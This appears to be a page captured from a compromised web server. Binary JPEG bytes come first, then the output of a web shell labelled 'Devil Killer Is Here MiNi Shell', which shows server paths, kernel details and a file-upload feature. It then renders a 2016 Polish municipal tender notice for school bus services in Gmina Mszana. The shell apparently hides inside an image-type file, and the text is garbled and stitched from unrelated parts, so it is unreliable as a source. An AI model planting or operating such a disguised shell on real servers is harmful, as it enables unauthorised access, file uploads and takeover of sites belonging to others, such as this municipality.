JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160725/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160725/153747-N-2016.html

<p class="kh_header"><b>Mszana: Dowóz dzieci i młodzieży do placówek oświatowych na terenie Gminy Mszana w okresie od 01.09.2016 r. do 13.01.2017 r.</b><br>
<b>Numer ogłoszenia: 153747 - 2016; data zamieszczenia: 25.07.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Mszana , ul. 1 Maja 81, 44-325 Mszana, woj. śląskie, tel. 32 4759740, 4759755.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mszana.ug.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dowóz dzieci i młodzieży do placówek oświatowych na terenie Gminy Mszana w okresie od 01.09.2016 r. do 13.01.2017 r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje dowóz dzieci i młodzieży szkolnej do placówek oświatowych na terenie Gminy Mszana w okresie od 01.09.2016 r. do 13.01.2017 r. 
Zamówienie podzielono na 2 części. Wykonawcy mogą składać oferty na każdą część osobno.

Część I
Dowóz dzieci i młodzieży szkolnej do szkół podstawowych i gimnazjum na terenie Gminy Mszana w okresie od 01.09.2016 r. do 13.01.2017 r.

Wykaz tras autobusowych: 

1. Dowóz dzieci (mieszkańców Gogołowej)  do Szkoły Podstawowej w Połomi ORAZ POWRÓT
KURSY PORANNE - Dojazd ze szkoły
a) trasa:   
początek trasy:  GOGOŁOWA CENTRUM; 
przez: ul. Wiejską,  ul. Szkolną;  
koniec trasy:   POŁOMIA  PARKING - CMENTARZ; 
odległość 2,7 km;  
przewidywana liczba kursów - 6 kursów tygodniowo;
tj. 106 kursów w okresie realizacja zamówienia.
	  
KURSY POŁUDNIOWE -  Powrót ze szkoły:
b) trasa:    
początek trasy: POŁOMIA  PARKING - CMENTARZ; 
przez:  ul. Szkolną, ul. Wiejską;  
koniec trasy:  GOGOŁOWA CENTRUM;  
odległość  2,7 km; 
przewidywana liczba kursów - 7 kursów tygodniowo;
tj. 123 kursy w okresie realizacja zamówienia.

2. Dowóz dzieci do Gimnazjum w Gogołowej i SP w Połomi.
KURSY PORANNE - dojazd do szkoły 
a)	trasa:   
początek trasy:  POŁOMIA FOLWARK; 
przez  (ul. Centralną,  ul. Szkolną  Cmentarz, ul. Wiejską w Gogołowej); 
koniec trasy:  GOGOŁOWA CENTRUM;  
odległość   5,6 km; 
przewidywana liczba kursów - 5 tygodniowo;
tj. 88 kursów w okresie realizacja zamówienia.

b) trasa: początek trasy: POŁOMIA DOLANEK; 
przez: (ul. Wolności, ul. Centralną, ul. Szkolną, ul. Wiejską);  
koniec trasy: GOGOŁOWA CENTRUM; 
odległość   5 km; 
przewidywana liczba kursów - 5 tygodniowo;
tj. 88 kursów w okresie realizacja zamówienia.

KURSY POŁUDNIOWE -  Powrót ze szkoły:
c)trasa: 
początek trasy:  GOGOŁOWA CENTRUM;
przez ul. Wiejską,  ul. Szkolna, ul. Centralna w kierunku Połomia  Folwark, 
NAWRÓT ul. Centralna, ul. Wolności;
koniec trasy POŁOMIA DOLANEK;  
odległość   10,7 km;
przewidywana liczba kursów - 10 tygodniowo; 
tj. 176 kursów w okresie realizacja zamówienia.
 	 	 
- Przewidywana ilość dni w których Wykonawca zobowiązany jest do przewozu osób - 88 dni szkolnych. Zamawiający zastrzega sobie, w uzasadnionych przypadkach, prawo do możliwości zwiększenia lub zmniejszenia liczby dni w których wykonywana jest usługa, 
- Wykonawca zobowiązany jest zapewnić do dyspozycji Zamawiającego, każdego dnia roboczego, za wyjątkiem okresów wolnych od zajęć, co najmniej 2 autobusy o ilości miejsc siedzących minimum 47,
- Wykonawca zobowiązany jest, w ciągu 45 minut, do zorganizowania transportu zastępczego w przypadku awarii środka transportu,
- Zamawiający finansuje jedynie przewóz uczniów od pierwszego przystanka do szkoły i trasę powrotną. Zamawiający nie pokrywa kosztów dojazdu autobusu z bazy i na bazę Wykonawcy.
- Oferowana cena jest stała za cały okres obowiązywania umowy. 
- Rozkład jazdy autobusów obowiązujący Wykonawcę ustalony zostanie odrębnie i stanowić będzie załącznik do umowy. 
- Zamawiający zapewnia opiekę wychowawcy w autobusie.

Część II
Dowóz dzieci przedszkolnych do przedszkola w Połomi w okresie od 01.09.2016 r. do 13.01.2017 r.

KURSY PORANNE - dojazd do przedszkola:
trasa:   
początek trasy:  POŁOMIA ul. Granice; 
przez: ul. Granice, ul. Wolności,  ul. Szkolną;  
koniec trasy:   POŁOMIA  PARKING przy ZSP Połomia; 
odległość 4 km;  
przewidywana liczba kursów - 5 kursów tygodniowo;
liczba dzieci, którym należy zorganizować dowóz - 5.
	  
KURSY POŁUDNIOWE -  powrót z przedszkola:
trasa:    
początek trasy: POŁOMIA  PARKING przy ZSP Połomia; 
przez:  ul. Szkolną, ul. Wolności, ul. Granice;  
koniec trasy:  POŁOMIA ul. Granice;  
odległość  4 km; 
przewidywana liczba kursów - 5 kursów tygodniowo;
liczba dzieci, którym należy zorganizować dowóz - 5.

- Przewidywana ilość dni w których Wykonawca zobowiązany jest do przewozu dzieci - 88 dni szkolnych. Zamawiający zastrzega sobie, w uzasadnionych przypadkach, prawo do możliwości zwiększenia lub zmniejszenia liczby dni w których wykonywana jest usługa.
- Wykonawca zobowiązany jest, w ciągu 45 minut, do zorganizowania transportu zastępczego w przypadku awarii środka transportu,
- Zamawiający finansuje jedynie przewóz dzieci na wyznaczonych trasach. Zamawiający nie pokrywa kosztów dojazdu środka transportu z bazy i na bazę Wykonawcy.
- Oferowana cena jest stała za cały okres obowiązywania umowy. Cena wynikać musi z ceny za 1 dzień szkolny podanej przez Wykonawcę w ofercie.
- Rozkład jazdy obowiązujący Wykonawcę ustalony zostanie odrębnie i stanowić będzie załącznik do umowy.
- Wykonawca zapewnia opiekuna (osoba dorosła) w trakcie przewozu dzieci do i z przedszkola. Opiekun zobowiązany jest do zaprowadzenia i odebrania dzieci z przedszkola..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 13.01.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium nie jest wymagane.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że posiada aktualne zezwolenie na wykonywanie zawodu przewoźnika drogowego lub posiada aktualną licencję na wykonywanie krajowego transportu drogowego osób zgodnie z ustawą z dnia 6 września 2001 roku o transporcie drogowym (j.t. Dz.U. z 2013 r., poz. 1414 z późn. zm.).
Ocena spełniania warunku dokonana zostanie na podstawie oświadczenia Wykonawcy o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ustawy i przedłożonych przez Wykonawcę dokumentów potwierdzających spełnienie warunku posiadania uprawnień do prowadzenia działalności objętej przedmiotem zamówienia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla części I - Warunek ten zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub wykonuje co najmniej jedną usługę polegającą na przewozie uczniów w okresie minimum jednego roku o wartości nie niższej niż 50 000,00 [pięćdziesiąt tysięcy złotych] zł brutto. 
W celu oceny spełnienia przez Wykonawcę tego warunku, o którym mowa powyżej, Wykonawca zobowiązany jest przedłożyć wraz z ofertą wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie, z tym że w odniesieniu do usług nadal wykonywanych poświadczenie powinno być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
Ocena spełniania warunku dokonana zostanie na podstawie oświadczenia Wykonawcy o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ustawy i przedłożonego przez Wykonawcę wykazu usług.
Dla części II - Warunek ten zostanie spełniony, jeżeli Wykonawca jeżeli Wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu.
Ocena spełnienia warunku zostanie dokonana na podstawie oświadczenia Wykonawcy o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla części I - Warunek ten zostanie uznany za spełniony, jeżeli Wykonawca wykaże dysponowanie (dysponuje lub będzie dysponował) odpowiednim potencjałem technicznym w celu realizacji zamówienia, w tym, co najmniej dwoma autobusami o ilości miejsc siedzących minimum 47. Wskazane pojazdy muszą posiadać ważne badanie techniczne i ubezpieczenie OC.
W celu oceny spełnienia przez Wykonawcę tego warunku, o którym mowa powyżej, Wykonawca zobowiązany jest przedłożyć wraz z ofertą wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych Wykonawcy w celu wykonania zamówienia wraz z informacją o podstawie dysponowania tymi zasobami.
Ocena spełnienia warunku zostanie dokonana na podstawie oświadczenia Wykonawcy o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ustawy i przedłożonego przez Wykonawcę wykazu potwierdzającego dysponowanie powyższym sprzętem, wraz z informacją o podstawie dysponowania tymi zasobami.
Dla części II - Warunek ten zostanie uznany za spełniony, jeżeli Wykonawca wykaże dysponowanie (dysponuje lub będzie dysponował) odpowiednim potencjałem technicznym w celu realizacji zamówienia, w tym, co najmniej jednym samochodem typu bus o ilości miejsc siedzący 9. Wskazany pojazd musi posiadać ważne badanie techniczne i ubezpieczenie OC.
W celu oceny spełnienia przez Wykonawcę tego warunku, o którym mowa powyżej, Wykonawca zobowiązany jest przedłożyć wraz z ofertą wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych Wykonawcy w celu wykonania zamówienia wraz z informacją o podstawie dysponowania tymi zasobami.
Ocena spełnienia warunku zostanie dokonana na podstawie oświadczenia Wykonawcy o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ustawy i przedłożonego przez Wykonawcę wykazu potwierdzającego dysponowanie powyższym sprzętem, wraz z informacją o podstawie dysponowania tymi zasobami.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla części I - Warunek ten zostanie uznany za spełniony, jeżeli Wykonawca wykaże dysponowanie co najmniej dwoma (2) osobami posiadającymi odpowiednie uprawnienia do realizacji przedmiotu zamówienia. Osoby te muszą posiadać wymagane uprawnienia tj. ważne prawo jazdy odpowiedniej kategorii oraz ważne świadectwo kwalifikacji lub zaświadczenie o ukończeniu kursu dokształcającego kierowców przewożących osoby.
Ocena spełniania warunku dokonana zostanie na podstawie oświadczenia Wykonawcy o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ustawy, wykazu osób uczestniczących w wykonywaniu zamówienia i oświadczenia Wykonawcy, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia.
Dla części II - Warunek ten zostanie uznany za spełniony, jeżeli Wykonawca dysponuje osobą posiadającą odpowiednie uprawnienia do realizacji przedmiotu zamówienia. Osoba ta musi posiadać wymagane uprawnienia tj. ważne prawo jazdy odpowiedniej kategorii oraz ważne świadectwo kwalifikacji lub zaświadczenie o ukończeniu kursu dokształcającego kierowców przewożących osoby.
Ocena spełniania warunku dokonana zostanie na podstawie oświadczenia Wykonawcy o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ustawy i oświadczenia Wykonawcy, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla części I - Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że posiada aktualną (opłaconą) polisę ubezpieczeniową, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności, na kwotę nie mniejszą niż 100 000,00 złotych.
Ocena spełnienia warunku zostanie dokonana na podstawie oświadczenia Wykonawcy o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ustawy oraz przedłożonej przez Wykonawcę kopii zawartej polisy ubezpieczeniowej wraz z potwierdzeniem jej opłacenia lub innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.
Dla części II - Warunek ten zostanie spełniony, jeżeli Wykonawca jeżeli Wykonawca złoży oświadczenie o spełnieniu warunków udziału w postępowaniu.
Ocena spełnienia warunku zostanie dokonana na podstawie oświadczenia Wykonawcy o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. wypełnioną i podpisaną przez osoby upoważnione do reprezentowania Wykonawcy Ofertę wraz z załącznikami - z wykorzystaniem wzoru stanowiącego załącznik nr 1 do SIWZ;
2.pełnomocnictwo - do reprezentowania wykonawców w postępowaniu albo do reprezentowania wykonawców w postępowaniu i zawarcia umowy, jeżeli osoba reprezentująca wykonawców w postępowaniu o udzielenie zamówienia nie jest wskazana jako upoważniona do jego reprezentacji we właściwym rejestrze lub ewidencji działalności gospodarczej;  
3. dowód dysponowania zasobami innych podmiotów do wykonania zamówienia w przypadku polegania na zdolnościach innych podmiotów, zgodnie z art. 26 ust. 2b ustawy, w szczególności pisemne zobowiązanie (z wykorzystaniem wzoru stanowiącego załącznik nr 8 do Formularza oferty) innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia wraz ze wskazaniem, że zobowiązanie to zostało podpisane przez osoby uprawnione (np. dokumenty rejestrowe, pełnomocnictwa) - jeżeli dotyczy;
4. dokument potwierdzający opłacenie załączonej do oferty polisy ubezpieczeniowej.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Termin płatności faktury - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
